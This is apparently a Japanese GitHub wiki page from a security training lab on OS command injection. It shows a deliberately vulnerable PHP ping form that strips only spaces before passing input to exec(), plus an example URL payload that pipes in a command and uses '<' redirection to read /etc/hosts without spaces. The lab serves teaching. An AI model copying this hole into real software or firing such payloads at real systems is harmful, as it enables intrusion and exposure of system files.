OSコマンドインジェクション 02 - yujitounai/helloworld GitHub Wiki
ユーザーの入力値を使ってOSコマンドを実行している スペースが除去される
<div class="box">スペースが除去される
<form method="get" action="">ping
<input name="host" type="text">
<input type="submit">
</form>
</div>
<?php
$host=filter_input(INPUT_GET, 'host');
$host = str_replace(array(""," "), "", $host);
$r = exec('ping -c 1 -W 1 '. $host,$output, $retval);
foreach($output as $value){
echo $value;
echo "<br>\n";
}
?>
http://localhost:9001/oscommand-02.php?host=|cat%3C/etc/hosts